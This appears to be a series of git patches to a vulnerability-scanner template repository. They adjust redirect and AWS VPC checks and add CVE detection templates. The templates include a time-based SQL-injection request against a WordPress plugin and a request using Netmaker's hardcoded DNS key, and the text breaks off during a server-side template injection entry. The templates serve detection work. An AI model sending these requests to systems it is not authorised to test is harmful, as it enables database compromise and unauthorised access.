Referer: {{RootURL}} + + matchers-condition: and + matchers: + - type: word + part: header + words: + - 'application/json' + + - type: word + part: body + words: + - '"items":' + - ':"true"' + condition: and + + - type: status + status: + - 200 From dfbd3dd3dada37b854cf16df12a84c242488e032 Mon Sep 17 00:00:00 2001 From: idealphase <mynameisphase@gmail.com> Date: Mon, 29 Apr 2024 16:23:33 +0700 Subject: [PATCH 0405/1768] Update https-to-http-redirect.yaml added HTTP status code 303, 306, 308 that can be redirected as well. --- http/misconfiguration/https-to-http-redirect.yaml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/http/misconfiguration/https-to-http-redirect.yaml b/http/misconfiguration/https-to-http-redirect.yaml index b32e2d48b7..ec60c5c28b 100644 --- a/http/misconfiguration/https-to-http-redirect.yaml +++ b/http/misconfiguration/https-to-http-redirect.yaml @@ -2,7 +2,7 @@ id: https-to-http-redirect info: name: HTTPS to HTTP redirect Misconfiguration - author: kazet + author: kazet, idealphase severity: info description: | Detects whether there is a redirect from https:// to http:// @@ -21,6 +21,6 @@ http: dsl: - 'startswith(tolower(location), "http://")' - 'startswith(tostring(BaseURL), "https://")' - - '(status_code == 301 || status_code == 302 || status_code == 307)' + - '(status_code == 301 || status_code == 302 || status_code == 303 || status_code == 306 || status_code == 307 || status_code == 308)' condition: and -# digest: 4a0a0047304502206212deffff885bc2abd110b7921124764815e61844a28cf278f271f6d9753151022100861fee57cff6e033d3b77a48aa8a88595f5d7ea267d502b1aadf739e417f6608:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100efb999299d91727307015418aa6194270d37d3aec81b3357ac608f26e25b304a0220034415e5f53862e08c79733a9b20cc2f86959c7344e8d9c97d533260b086aa95:32bd8904a85baa2268cd2e24368f3b1a From 464338ac0b55b97137cc93e93864a52d6a577e3b Mon Sep 17 00:00:00 2001 From: Prince Chaddha <cyberbossprince@gmail.com> Date: Mon, 29 Apr 2024 15:05:31 +0530 Subject: [PATCH 0406/1768] updated iterate to vpc templates --- cloud/aws/vpc/nacl-open-inbound.yaml | 2 +- cloud/aws/vpc/nacl-outbound-restrict.yaml | 2 +- cloud/aws/vpc/nat-gateway-usage.yaml | 2 +- cloud/aws/vpc/unrestricted-admin-ports.yaml | 2 +- cloud/aws/vpc/vpc-endpoint-exposed.yaml | 2 +- cloud/aws/vpc/vpc-endpoints-not-deployed.yaml | 2 +- cloud/aws/vpc/vpc-flowlogs-not-enabled.yaml | 2 +- cloud/aws/vpc/vpn-tunnel-down.yaml | 2 +- 8 files changed, 8 insertions(+), 8 deletions(-) diff --git a/cloud/aws/vpc/nacl-open-inbound.yaml b/cloud/aws/vpc/nacl-open-inbound.yaml index b034f682de..0d801e55a4 100644 --- a/cloud/aws/vpc/nacl-open-inbound.yaml +++ b/cloud/aws/vpc/nacl-open-inbound.yaml @@ -18,7 +18,7 @@ variables: flow: | code(1) - for(let NACLIDs of template.nacls){ + for(let NACLIDs of iterate(template.nacls)){ set("naclid", NACLIDs) code(2) } diff --git a/cloud/aws/vpc/nacl-outbound-restrict.yaml b/cloud/aws/vpc/nacl-outbound-restrict.yaml index ef060c8c95..0a8d0aeb3b 100644 --- a/cloud/aws/vpc/nacl-outbound-restrict.yaml +++ b/cloud/aws/vpc/nacl-outbound-restrict.yaml @@ -18,7 +18,7 @@ variables: flow: | code(1) - for(let NACLIDs of template.nacls){ + for(let NACLIDs of iterate(template.nacls)){ set("naclid", NACLIDs) code(2) } diff --git a/cloud/aws/vpc/nat-gateway-usage.yaml b/cloud/aws/vpc/nat-gateway-usage.yaml index 8757af280b..6ae49f14f2 100644 --- a/cloud/aws/vpc/nat-gateway-usage.yaml +++ b/cloud/aws/vpc/nat-gateway-usage.yaml @@ -18,7 +18,7 @@ variables: flow: | code(1) - for(let VPCIds of template.vpcid){ + for(let VPCIds of iterate(template.vpcid)){ set("vpc", VPCIds) code(2) } diff --git a/cloud/aws/vpc/unrestricted-admin-ports.yaml b/cloud/aws/vpc/unrestricted-admin-ports.yaml index 3a632591f5..e849f4d6fa 100644 --- a/cloud/aws/vpc/unrestricted-admin-ports.yaml +++ b/cloud/aws/vpc/unrestricted-admin-ports.yaml @@ -18,7 +18,7 @@ variables: flow: | code(1) - for(let NACLIDs of template.nacls){ + for(let NACLIDs of iterate(template.nacls)){ set("naclid", NACLIDs) code(2) } diff --git a/cloud/aws/vpc/vpc-endpoint-exposed.yaml b/cloud/aws/vpc/vpc-endpoint-exposed.yaml index e8d4975bdd..d3df3d424c 100644 --- a/cloud/aws/vpc/vpc-endpoint-exposed.yaml +++ b/cloud/aws/vpc/vpc-endpoint-exposed.yaml @@ -18,7 +18,7 @@ variables: flow: | code(1) - for(let VpcIds of template.VpcId){ + for(let VpcIds of iterate(template.VpcId)){ set("vpc", VpcIds) code(2) } diff --git a/cloud/aws/vpc/vpc-endpoints-not-deployed.yaml b/cloud/aws/vpc/vpc-endpoints-not-deployed.yaml index 887ccce5c2..643ad54e3e 100644 --- a/cloud/aws/vpc/vpc-endpoints-not-deployed.yaml +++ b/cloud/aws/vpc/vpc-endpoints-not-deployed.yaml @@ -18,7 +18,7 @@ variables: flow: | code(1) - for(let VpcIds of template.VpcId){ + for(let VpcIds of iterate(template.VpcId)){ set("vpc", VpcIds) code(2) } diff --git a/cloud/aws/vpc/vpc-flowlogs-not-enabled.yaml b/cloud/aws/vpc/vpc-flowlogs-not-enabled.yaml index 944bce4945..c16ed320d9 100644 --- a/cloud/aws/vpc/vpc-flowlogs-not-enabled.yaml +++ b/cloud/aws/vpc/vpc-flowlogs-not-enabled.yaml @@ -18,7 +18,7 @@ variables: flow: | code(1) - for(let VpcIds of template.VpcId){ + for(let VpcIds of iterate(template.VpcId)){ set("vpc", VpcIds) code(2) } diff --git a/cloud/aws/vpc/vpn-tunnel-down.yaml b/cloud/aws/vpc/vpn-tunnel-down.yaml index 10d27b280a..129cbaf5eb 100644 --- a/cloud/aws/vpc/vpn-tunnel-down.yaml +++ b/cloud/aws/vpc/vpn-tunnel-down.yaml @@ -18,7 +18,7 @@ variables: flow: | code(1) - for(let VpnConnectionIds of template.vpnconnactions){ + for(let VpnConnectionIds of iterate(template.vpnconnactions)){ set("vpnid", VpnConnectionIds) code(2) } From 273f4aa5313063b54e5b97304b44de92b5d3864c Mon Sep 17 00:00:00 2001 From: idealphase <mynameisphase@gmail.com> Date: Mon, 29 Apr 2024 16:42:04 +0700 Subject: [PATCH 0407/1768] Update https-to-http-redirect.yaml add HTTP status code 300 (Multiple Choices) remove HTTP status code 306 (Unused) --- http/misconfiguration/https-to-http-redirect.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/http/misconfiguration/https-to-http-redirect.yaml b/http/misconfiguration/https-to-http-redirect.yaml index ec60c5c28b..6e77295ca0 100644 --- a/http/misconfiguration/https-to-http-redirect.yaml +++ b/http/misconfiguration/https-to-http-redirect.yaml @@ -21,6 +21,6 @@ http: dsl: - 'startswith(tolower(location), "http://")' - 'startswith(tostring(BaseURL), "https://")' - - '(status_code == 301 || status_code == 302 || status_code == 303 || status_code == 306 || status_code == 307 || status_code == 308)' + - '(status_code == 300 || status_code == 301 || status_code == 302 || status_code == 303 || status_code == 307 || status_code == 308)' condition: and -# digest: 4a0a00473045022100efb999299d91727307015418aa6194270d37d3aec81b3357ac608f26e25b304a0220034415e5f53862e08c79733a9b20cc2f86959c7344e8d9c97d533260b086aa95:32bd8904a85baa2268cd2e24368f3b1a +# digest: 4a0a00473045022100b9fde0b93319dcf6c7deda7cbca2fc520ef1dfb694e8756f6f04cdfb585c070e02205737762ea399cbcdaf947d7a6e394df2676b64d3e867497034ce78ba661eb683:32bd8904a85baa2268cd2e24368f3b1a From 3081bdca0b28b1bbda338e915993ac51d4391f84 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Mon, 29 Apr 2024 10:03:32 +0000 Subject: [PATCH 0409/1768] Auto Generated Templates Checksum [Mon Apr 29 10:03:32 UTC 2024] :robot: --- templates-checksum.txt | 22 +++++++++++----------- 1 file changed, 11 insertions(+), 11 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 5f13a9d250..db7bfd778f 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -88,14 +88,14 @@ cloud/aws/s3/s3-public-write-acp.yaml:3f2b36613d8008e1ac419f86a3986b6805958a39 cloud/aws/s3/s3-public-write.yaml:f437b7481168279f14d743f6fcec2b07388e894e cloud/aws/s3/s3-server-side-encryption.yaml:5ad53f21b9bd0f6429456de397a4ecf6b45f5e24 cloud/aws/s3/s3-versioning.yaml:bc4dadf7b83430d4f1d666bc0d61fff82bd0af1a -cloud/aws/vpc/nacl-open-inbound.yaml:c37fc3d3cf8f958463cc9866508ae592b443f45f -cloud/aws/vpc/nacl-outbound-restrict.yaml:2bf48e55f84c699328d7b6fa817ddaeeb2dd0bd1 -cloud/aws/vpc/nat-gateway-usage.yaml:1be291e02105543d5dd3e21ab16ad934f0378fdc -cloud/aws/vpc/unrestricted-admin-ports.yaml:9ff885af43ee0f899f553eca7ede2dad946d9b7e -cloud/aws/vpc/vpc-endpoint-exposed.yaml:b92e7486a3d12b8e7852462749cb2367100d9bf1 -cloud/aws/vpc/vpc-endpoints-not-deployed.yaml:b9a8f1c8578f6fa44a539f3f728f7166a71923b3 -cloud/aws/vpc/vpc-flowlogs-not-enabled.yaml:9e579ae244c162e6fa5b27348290079e1c9a5008 -cloud/aws/vpc/vpn-tunnel-down.yaml:5151f54f14688d396709d5c2d16c3c7b087e2d4b +cloud/aws/vpc/nacl-open-inbound.yaml:a59856c3bf2fc447e5d445a29f86eecacb104fa5 +cloud/aws/vpc/nacl-outbound-restrict.yaml:21f7402fc9850fda7d772202b9642e80a04c5c51 +cloud/aws/vpc/nat-gateway-usage.yaml:f274063e1784291dc3a15351186c20e1ec690d26 +cloud/aws/vpc/unrestricted-admin-ports.yaml:3cc2ddd2a9d04778330c98ede0ee37aa88271385 +cloud/aws/vpc/vpc-endpoint-exposed.yaml:2a451c74b1c96ea8c3b7526ea1d97f86a0bb2a40 +cloud/aws/vpc/vpc-endpoints-not-deployed.yaml:2c11caa8e828544889e4729cf0dcd29e8a455528 +cloud/aws/vpc/vpc-flowlogs-not-enabled.yaml:9e5475b15f330db99344cf6586e9c08bc445ae1a +cloud/aws/vpc/vpn-tunnel-down.yaml:cd033a2465fab6d1693d7b455a4e15914971ef42 cloud/enum/aws-app-enum.yaml:61abc31cc0ae208df9ed070e7d238edde3e82f48 cloud/enum/aws-s3-bucket-enum.yaml:0d101b898bbaebceea4020963d11829f8167029f cloud/enum/azure-db-enum.yaml:1a84da310edfa148667be811a8f749b93a263d0a @@ -8280,7 +8280,7 @@ network/backdoor/backdoored-zte.yaml:42b5ec609229045d3ebbb6e8968a1797413afb44 network/c2/darkcomet-trojan.yaml:b8f71af056f9dfd77c24d37df301be7fba986838 network/c2/darktrack-rat-trojan.yaml:36425c7572204441890fd6ad0336762658fbe963 network/c2/orcus-rat-trojan.yaml:a4c141d7019f20768165f92ac5d4bfc08e8551d9 -network/c2/xtremerat-trojan.yaml:fa2fa746275c57dc51a7b0ca987f5b1c9783fc79 +network/c2/xtremerat-trojan.yaml:b2b611a36dec8a18ab75471c7a8429e6952603ca network/cves/2001/CVE-2001-1473.yaml:5374944a926a53026fd02e17333ab21c0fd94115 network/cves/2011/CVE-2011-2523.yaml:439f13ea18e52af5b7de1ae93ed2de579a3157c3 network/cves/2015/CVE-2015-3306.yaml:89bdabc177692a54c7c144c2c45446b15350f513 @@ -8301,7 +8301,7 @@ network/default-login/ftp-anonymous-login.yaml:0eb4d44490e80c5f5f8e7e9e7ecb1fa0c network/default-login/ftp-weak-credentials.yaml:c0cf4a3227435e117de922b08ad77edebf6304a5 network/default-login/ldap-anonymous-login.yaml:1d0d2f3485fec11106c15b75166448f9ab047eec network/detection/activemq-openwire-transport-detect.yaml:da59945499ac1f46d9ac606f27d98dd8e1e493d9 -network/detection/aix-websm-detect.yaml:5f48d15d92ca7cffa357f5b16f8c5953e46566fe +network/detection/aix-websm-detect.yaml:a6158ad212ce805f35b16014fdd766fdfd739e37 network/detection/apache-activemq-detect.yaml:afd8fba85587220ae91e9120c3f7455529be8b5e network/detection/aws-sftp-detect.yaml:4c67b37ede734d66486377b851223abb638d1f78 network/detection/axigen-mail-server-detect.yaml:fbf92b3b9d61df5aaf614b98b570149d62bd96ef @@ -8453,7 +8453,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:5a4967397f87a5e4bf8b4968ee500d7882ef0f51 +templates-checksum.txt:9d3d424dfd56ed2deffd10f1dd20dc19a2dc14f5 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 168f3f094f89aad5c229e400e5f9b15842482e14 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Mon, 29 Apr 2024 10:05:20 +0000 Subject: [PATCH 0410/1768] Auto Template Signing [Mon Apr 29 10:05:20 UTC 2024] :robot: --- cloud/aws/vpc/nacl-open-inbound.yaml | 2 +- cloud/aws/vpc/nacl-outbound-restrict.yaml | 2 +- cloud/aws/vpc/nat-gateway-usage.yaml | 2 +- cloud/aws/vpc/unrestricted-admin-ports.yaml | 2 +- cloud/aws/vpc/vpc-endpoint-exposed.yaml | 2 +- cloud/aws/vpc/vpc-endpoints-not-deployed.yaml | 2 +- cloud/aws/vpc/vpc-flowlogs-not-enabled.yaml | 2 +- cloud/aws/vpc/vpn-tunnel-down.yaml | 2 +- 8 files changed, 8 insertions(+), 8 deletions(-) diff --git a/cloud/aws/vpc/nacl-open-inbound.yaml b/cloud/aws/vpc/nacl-open-inbound.yaml index 0d801e55a4..1e8bf93789 100644 --- a/cloud/aws/vpc/nacl-open-inbound.yaml +++ b/cloud/aws/vpc/nacl-open-inbound.yaml @@ -60,4 +60,4 @@ code: - type: dsl dsl: - '"Access to the VPC subnets associated with your NACL " + naclid + " is not restricted."' -# digest: 490a00463044022061fa0f1f88763697856638e53fa1b78a8587487f6f691d28fdd57818ef2ab00a02204919554ac19da3748543fd6a0299c765833719eece0b93ca663319a3b75faba2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502200de3239f933f1b468292a1ac4504bc398cad18ac3aa6f2de12357bd0e8a65759022100ee901336ec076eb9058f105f779e66be7bac556e1751713419df333cca4eaddf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/aws/vpc/nacl-outbound-restrict.yaml b/cloud/aws/vpc/nacl-outbound-restrict.yaml index 0a8d0aeb3b..b7483da1ef 100644 --- a/cloud/aws/vpc/nacl-outbound-restrict.yaml +++ b/cloud/aws/vpc/nacl-outbound-restrict.yaml @@ -60,4 +60,4 @@ code: - type: dsl dsl: - '"Access to the VPC subnets associated with your NACL " + naclid + " is not restricted."' -# digest: 4a0a00473045022100e86f2a3e5590550fdcae3b2df793550b4ef1c178662d2231cc58bfb4d120c8c6022013a6044df37c3210f35945503f89ceae1bec5494e3d893bc4bddeef18ab5a460:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022021e25dd23124572a8f6dbe6381024f3ecb8f78907d7ba0aafa2eb9c63990e140022100ba7669b283e58bf5b0fd08f3d5501d54221fc7a48b73b088c95330ea4c633f67:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/aws/vpc/nat-gateway-usage.yaml b/cloud/aws/vpc/nat-gateway-usage.yaml index 6ae49f14f2..308cb0ab0d 100644 --- a/cloud/aws/vpc/nat-gateway-usage.yaml +++ b/cloud/aws/vpc/nat-gateway-usage.yaml @@ -53,4 +53,4 @@ code: - type: dsl dsl: - 'vpc + " VPC is not using Managed NAT Gateways"' -# digest: 4a0a00473045022100c0877797c85620a3b1a36e36908c96c828bcd0dc31d1b46eadfbad0cb57887cb0220322e780cb1d41741e04ff1fa0dfd2d35efe10a367c625bf3dfa3ef63c1297eb8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f5f55c1da4e2aaca4b9547bf032c91c95a45a559e294e66e3a04343878e6416c022100919f04f7539cccd971883f2ac51a5a40f17c588dc2bb561902f5397715facf2a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/aws/vpc/unrestricted-admin-ports.yaml b/cloud/aws/vpc/unrestricted-admin-ports.yaml index e849f4d6fa..11da6b63b4 100644 --- a/cloud/aws/vpc/unrestricted-admin-ports.yaml +++ b/cloud/aws/vpc/unrestricted-admin-ports.yaml @@ -62,4 +62,4 @@ code: - type: dsl dsl: - '"Access to the VPC subnets associated with your NACL " + naclid + " is not restricted."' -# digest: 4b0a00483046022100c7ef9e19cd61d8fcfb7e1d1faf314a723142d80e0796b5101a964a2ece956abe022100c3b4d818fb5d2da95501f4e15d27dab96a8af3b6c26c7e1da86e6a8b98b2c35d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502204e05c381a073d28047bdf9026597e5d331abca5011bbd8887ac323dd2b2983fb02210097ddd0dd706718f37b2c2f54820e543a9c6549883adc31296235e4b04fe04e97:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/aws/vpc/vpc-endpoint-exposed.yaml b/cloud/aws/vpc/vpc-endpoint-exposed.yaml index d3df3d424c..6fe8d3c737 100644 --- a/cloud/aws/vpc/vpc-endpoint-exposed.yaml +++ b/cloud/aws/vpc/vpc-endpoint-exposed.yaml @@ -60,4 +60,4 @@ code: - type: dsl dsl: - '"VPC endpoints for " + vpc + "are exposed."' -# digest: 4a0a0047304502206fa64b542b8c69a54cd76e83666f0b97b830db5028eb2b684f10388b858f03c7022100a060eff71326c75b63bd7b7caa82a62b376f352503548f36ae7875e06db2b0d1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221009cd9ca7d1c7ce5d6db43cc95291be7e509c29f9ed1c7559ee1aeb31a6579920902206e30e36ec371d03d1c5d805d349458ee43fd27bd65917e4f33050e359de8ea3b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/aws/vpc/vpc-endpoints-not-deployed.yaml b/cloud/aws/vpc/vpc-endpoints-not-deployed.yaml index 643ad54e3e..c2dcfb6728 100644 --- a/cloud/aws/vpc/vpc-endpoints-not-deployed.yaml +++ b/cloud/aws/vpc/vpc-endpoints-not-deployed.yaml @@ -53,4 +53,4 @@ code: - type: dsl dsl: - '"VPC Endpoints Not Deployed in the VPC network " + vpc' -# digest: 4b0a00483046022100cdf521a3643f23886dee5b78e9910dbd5137467596cffd6cf43641721bdd4c8f022100ada84927f32db8433b532c73902d578b91b0721574bb78b9a37b252df5cd8beb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220305c7cb9ef27a7249c71a3e30664db9f051b0f5438fe8ce42f2024ea91bfa24e022100e5b9e9b019adf2b1fcfd5121540efdbaf0c5fd39072523eacf41b5a50319666e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/aws/vpc/vpc-flowlogs-not-enabled.yaml b/cloud/aws/vpc/vpc-flowlogs-not-enabled.yaml index c16ed320d9..ca6474d99e 100644 --- a/cloud/aws/vpc/vpc-flowlogs-not-enabled.yaml +++ b/cloud/aws/vpc/vpc-flowlogs-not-enabled.yaml @@ -55,4 +55,4 @@ code: - type: dsl dsl: - '"Flow Logs feature is not enabled for the VPC " + vpc' -# digest: 4a0a0047304502201fd60ad86d7fc29391c14ef3ca473cca21f6dac84b73d1a81e87898e6ccb2e73022100dce88d76e827b4874c2672ed572625753817f3fd9642c10a7ab108e2eda2b794:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022016d83c316f318298be2c514542422c1a2f3a42517ac740d4b85ca980c9bf4676022100e7af7b416817f374b418962094ee777893f8fed6b17880fea736d1eb6caa38b2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/aws/vpc/vpn-tunnel-down.yaml b/cloud/aws/vpc/vpn-tunnel-down.yaml index 129cbaf5eb..1e7ddb8308 100644 --- a/cloud/aws/vpc/vpn-tunnel-down.yaml +++ b/cloud/aws/vpc/vpn-tunnel-down.yaml @@ -53,4 +53,4 @@ code: - type: dsl dsl: - 'vpnid + " VPN tunnel is down"' -# digest: 4a0a00473045022060f2043ba01e3483298dce863674208b94591615f73b91d4cb47e17eda4ebe310221009cfa4282260a3014b1f77a021f5d8248c4590b61f5e5904685fbcd631e178992:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402205ecec5a00e3d0521ad5a2e9ac0cebbe83e91d206c2233f683dcd750ff5b3841c02205528afb57d459d2c5075638280afcf53459f71aaeb2a5cabc21c41659d91f510:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 079537fc4fc673c664c87ef829360d2dc80bff97 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Mon, 29 Apr 2024 17:30:55 +0530 Subject: [PATCH 0411/1768] Create CVE-2024-27956.yaml --- http/cves/2024/CVE-2024-27956.yaml | 45 ++++++++++++++++++++++++++++++ 1 file changed, 45 insertions(+) create mode 100644 http/cves/2024/CVE-2024-27956.yaml diff --git a/http/cves/2024/CVE-2024-27956.yaml b/http/cves/2024/CVE-2024-27956.yaml new file mode 100644 index 0000000000..eab63ad557 --- /dev/null +++ b/http/cves/2024/CVE-2024-27956.yaml @@ -0,0 +1,45 @@ +id: CVE-2024-27956 + +info: + name: WordPress Automatic Plugin <= 3.92.0 - SQL Injection + author: DhiyaneshDK + severity: critical + description: | + The Automatic plugin for WordPress is vulnerable to SQL Injection in versions up to, and including, 3.92.0 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. + remediation: | + Update to version 3.92.1 or later. + reference: + - https://github.com/truonghuuphuc/CVE-2024-27956 + - https://patchstack.com/database/vulnerability/wp-automatic/wordpress-automatic-plugin-3-92-0-unauthenticated-arbitrary-sql-execution-vulnerability?_s_id=cve + - https://github.com/NaInSec/CVE-LIST + - https://github.com/nomi-sec/PoC-in-GitHub + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:H/A:L + cvss-score: 9.9 + cve-id: CVE-2024-27956 + cwe-id: CWE-89 + epss-score: 0.00043 + epss-percentile: 0.08203 + metadata: + verified: true + max-request: 1 + publicwww-query: "wp-content/plugins/wp-automatic" + tags: cve,cve2024,sqli,wordpress,wpscan,wp-automatic + +http: + - raw: + - | + @timeout: 20s + POST /wp-content/plugins/wp-automatic/inc/csv.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + q=SELECT IF(1=1,sleep(5),sleep(0));&auth=%00&integ=dc9b923a00f0e449c3b401fb0d7e2fae + + matchers: + - type: dsl + dsl: + - 'duration>=5' + - 'status_code == 200' + - 'contains(header, "application/csv")' + condition: and From b0ad44e496ec87db6825c7c1443dd55285515c20 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Mon, 29 Apr 2024 18:24:31 +0530 Subject: [PATCH 0412/1768] Create CVE-2023-32077.yaml --- http/cves/2024/CVE-2023-32077.yaml | 39 ++++++++++++++++++++++++++++++ 1 file changed, 39 insertions(+) create mode 100644 http/cves/2024/CVE-2023-32077.yaml diff --git a/http/cves/2024/CVE-2023-32077.yaml b/http/cves/2024/CVE-2023-32077.yaml new file mode 100644 index 0000000000..56d58ef4eb --- /dev/null +++ b/http/cves/2024/CVE-2023-32077.yaml @@ -0,0 +1,39 @@ + id: CVE-2023-32077 + + info: + name: Netmaker - Hardcoded DNS Secret Key + author: iamnoooob,rootxharsh,pdresearch + severity: high + description: | + Netmaker makes networks with WireGuard. Prior to versions 0.17.1 and 0.18.6, hardcoded DNS key usage has been found in Netmaker allowing unauth users to interact with DNS API endpoints. + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2023-32077 + cwe-id: CWE-321,CWE-798 + epss-score: 0.0006 + epss-percentile: 0.24707 + cpe: cpe:2.3:a:gravitl:netmaker:*:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 1 + vendor: gravitl + product: netmaker + shodan-query: html:"netmaker" + tags: cve,cve2023,info-key,netmaker + + http: + - method: GET + path: + - "{{BaseURL}}/api/dns" + + headers: + Authorization: "x secretkey" + + matchers: + - type: dsl + dsl: + - 'contains_all(body, "address", "network")' + - 'status_code == 200' + - 'contains(header, "application/json")' + condition: and From 08ff5ab8c29dd5ec4df0727782ac599268e8d0aa Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Mon, 29 Apr 2024 18:29:55 +0530 Subject: [PATCH 0413/1768] fix spacing --- http/cves/2024/CVE-2023-32077.yaml | 70 +++++++++++++++--------------- 1 file changed, 35 insertions(+), 35 deletions(-) diff --git a/http/cves/2024/CVE-2023-32077.yaml b/http/cves/2024/CVE-2023-32077.yaml index 56d58ef4eb..edd93e82cb 100644 --- a/http/cves/2024/CVE-2023-32077.yaml +++ b/http/cves/2024/CVE-2023-32077.yaml @@ -1,39 +1,39 @@ - id: CVE-2023-32077 +id: CVE-2023-32077 - info: - name: Netmaker - Hardcoded DNS Secret Key - author: iamnoooob,rootxharsh,pdresearch - severity: high - description: | - Netmaker makes networks with WireGuard. Prior to versions 0.17.1 and 0.18.6, hardcoded DNS key usage has been found in Netmaker allowing unauth users to interact with DNS API endpoints. - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cve-id: CVE-2023-32077 - cwe-id: CWE-321,CWE-798 - epss-score: 0.0006 - epss-percentile: 0.24707 - cpe: cpe:2.3:a:gravitl:netmaker:*:*:*:*:*:*:*:* - metadata: - verified: true - max-request: 1 - vendor: gravitl - product: netmaker - shodan-query: html:"netmaker" - tags: cve,cve2023,info-key,netmaker +info: + name: Netmaker - Hardcoded DNS Secret Key + author: iamnoooob,rootxharsh,pdresearch + severity: high + description: | + Netmaker makes networks with WireGuard. Prior to versions 0.17.1 and 0.18.6, hardcoded DNS key usage has been found in Netmaker allowing unauth users to interact with DNS API endpoints. + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2023-32077 + cwe-id: CWE-321,CWE-798 + epss-score: 0.0006 + epss-percentile: 0.24707 + cpe: cpe:2.3:a:gravitl:netmaker:*:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 1 + vendor: gravitl + product: netmaker + shodan-query: html:"netmaker" + tags: cve,cve2023,info-key,netmaker - http: - - method: GET - path: - - "{{BaseURL}}/api/dns" +http: + - method: GET + path: + - "{{BaseURL}}/api/dns" - headers: - Authorization: "x secretkey" + headers: + Authorization: "x secretkey" - matchers: - - type: dsl - dsl: - - 'contains_all(body, "address", "network")' - - 'status_code == 200' - - 'contains(header, "application/json")' - condition: and + matchers: + - type: dsl + dsl: + - 'contains_all(body, "address", "network")' + - 'status_code == 200' + - 'contains(header, "application/json")' + condition: and From 7dccf1fdfab812ac3d086a48f9395f08744d6c92 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Mon, 29 Apr 2024 18:30:56 +0530 Subject: [PATCH 0414/1768] Rename CVE-2023-32077.yaml to CVE-2023-32077.yaml --- http/cves/{2024 => 2023}/CVE-2023-32077.yaml | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename http/cves/{2024 => 2023}/CVE-2023-32077.yaml (100%) diff --git a/http/cves/2024/CVE-2023-32077.yaml b/http/cves/2023/CVE-2023-32077.yaml similarity index 100% rename from http/cves/2024/CVE-2023-32077.yaml rename to http/cves/2023/CVE-2023-32077.yaml From b5ae4aae4a907d6f4b2b92bb7c54b44978952824 Mon Sep 17 00:00:00 2001 From: edoardottt <edoardott@gmail.com> Date: Mon, 29 Apr 2024 16:36:08 +0200 Subject: [PATCH 0415/1768] Add CVE-2024-32651 --- http/cves/2024/CVE-2024-32651.yaml | 48 ++++++++++++++++++++++++++++++ 1 file changed, 48 insertions(+) create mode 100644 http/cves/2024/CVE-2024-32651.yaml diff --git a/http/cves/2024/CVE-2024-32651.yaml b/http/cves/2024/CVE-2024-32651.yaml new file mode 100644 index 0000000000..41be5c7260 --- /dev/null +++ b/http/cves/2024/CVE-2024-32651.yaml @@ -0,0 +1,48 @@ +id: CVE-2024-32651 + +info: + name: changedetection.io - Server Side Template Injection + author: edoardottt + severity: critical + description: | + A Server Side Template Injection in changedetection.io + caused by usage of unsafe functions of Jinja2 allows Remote Command Execution on the server host. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2024-32651 + - https://github.com/dgtlmoon/changedetection.io/security/advisories/GHSA-4r7v-whpg-8rx3 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + 